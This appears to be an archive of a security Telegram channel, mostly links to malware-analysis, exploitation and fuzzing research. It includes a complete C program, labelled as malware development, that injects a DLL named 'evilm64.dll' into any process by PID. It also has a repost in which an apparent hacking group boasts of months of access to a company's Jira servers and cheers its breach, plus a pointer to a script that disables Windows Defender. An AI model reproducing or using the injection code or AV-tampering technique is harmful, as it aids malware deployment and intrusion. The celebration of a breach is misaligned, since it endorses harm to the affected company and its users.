Source Byte
Sober must be he who abstains from love; and this nature that I have does not mix with reason. Saadi Shirazi

Post archive
Exploits and rootkits in your browser extensions DEFCON 2021.

Tackling Anti-Analysis Techniques of GuLoader and RedLine Stealer Link #malware_analysis @islemolecule_source

Ghidra vs Cutter vs Binary Ninja vs IDA Free Link #disassembler @islemolecule_source

VirtualBox internals and exploitation (CVE-2023-21987 and CVE-2023-21991) credit : @qriousec https://qriousec.github.io/post/vbox-pwn2own-2023/ #virtualbox

• Realistic “photos” were published on Reddit, which were generated by AI and are great for identity verification)) In one photo there is a girl with a sign, and in the second, with an ID card. • Now think about what opportunities will open up for criminals when you can buy a passport for pennies on the darknet and generate a realistic photo through AI... • In the comments you can read how the author managed to generate such images: https://www.reddit.com 👀 #informative

We see a lot of threat actors in our Incident Response cases who disable or tamper with the local AV. The website http://privacy.sexy has a copy & paste script to turn off most of Defender's features. [1] How many of these modifications (or deactivations) will trigger an alert in your environment? @DebugPrivilege has written an excellent article about the various event logs Windows Defender creates, and in which event. [2] Run the commands on a test system, and look for gaps in your monitoring 🤓 [1] https://privacy.sexy [2] https://m365internals.com/2021/07/05/why-are-windows-defender-av-logs-so-important-and-how-to-monitor-them-with-azure-sentinel/ #AV ———

Fuzz Everything, Everywhere, All at Once - Advanced QEMU-based fuzzing https://media.ccc.de/v/37c3-12102-fuzz_everything_everywhere_all_at_once #fuzzing #LibAFL #QEMU ——— @islemolecule_source

Rust to Assembly: Understanding the Inner Workings of Rust. A collection of blog posts showing how Rust code maps to Assembly https://eventhelix.com/rust/ #rust ———

Initial Access – search-ms URI Handler credit: @hackerfantastic https://pentestlab.blog/2024/01/02/initial-access-search-ms-uri-handler/ #initial_access ——— @islemolecule_source

Repost from .....
⛔We have already uploaded Cafe Bazar transactions on the channel. And if CafeBazaar did not provide strong documents, a disaster like the Snapp Food disaster was waiting for Cafe Bazaar. Therefore, the censored documents were removed from the channel. But a few months ago, we informed Snapfood indirectly about the existence of vulnerabilities. Snapfood servers were vulnerable, and we had access to jira.snappfood.ir and jira.snapp.ir, ... for months and warned about them, but they didn't pay attention. In this post, we thank the elites of SnapFood: بهنام نصراللهی مهدی شکری سپهر رشادی. According to our and other people's warnings, we are happy about what happened to SnappFood! 📱@APTIRAN

Unlinking Malicious DLLs from the PEB Source #malware_dev @islemolecule_source

DLL Injection via SetWindowsHookExA Source #malware_dev @islemolecule_source

DLL Injection
1- address of the DLL
2- allocate a buffer in the target process
3- write the DLL address to that buffer
4- create a thread to execute

#define UNICODE /* needed so TEXT() yields a wide string for the wchar_t path below */
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[]) {
 HANDLE processHandle;
 PVOID remoteBuffer;
 wchar_t dllPath[] = TEXT("C:\\experiments\\evilm64.dll");

 if (argc < 2) return 1; /* expects the target PID as the only argument */
 printf("Injecting DLL to PID: %i\n", atoi(argv[1]));
 /* 1 - open the target process */
 processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, (DWORD)atoi(argv[1]));
 if (processHandle == NULL) return 1;
 /* 2 - allocate a buffer in the target process for the DLL path */
 remoteBuffer = VirtualAllocEx(processHandle, NULL, sizeof dllPath, MEM_COMMIT, PAGE_READWRITE);
 /* 3 - write the DLL path into that buffer */
 WriteProcessMemory(processHandle, remoteBuffer, (LPVOID)dllPath, sizeof dllPath, NULL);
 /* 4 - start a remote thread at LoadLibraryW with the remote buffer as its argument */
 PTHREAD_START_ROUTINE threadStartRoutineAddress = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW");
 CreateRemoteThread(processHandle, NULL, 0, threadStartRoutineAddress, remoteBuffer, 0, NULL);
 CloseHandle(processHandle);

 return 0;
}
iredteam #malware_dev @islemolecule_source

Exploiting a use-after-free in Linux kernel 5.15 (Ubuntu 22.04) (CVE-2022-32250) credit: @saidelike research.nccgroup.com/2022/0… #linux #kernel #analysis #exploitation __ @islemolecule_source

Great Burp Suite series by Meraj Heydari credit: @meraj_heydari language: Persian https://www.youtube.com/playlist?list=PL7ZQRFOOo39A0kV-GK-kFaX2jGA3PMz0- #burpsuite ——— @islemolecule_source

7k views & 150 likes on Twitter, I really don't know what to say 🤷‍♀ Share posts plz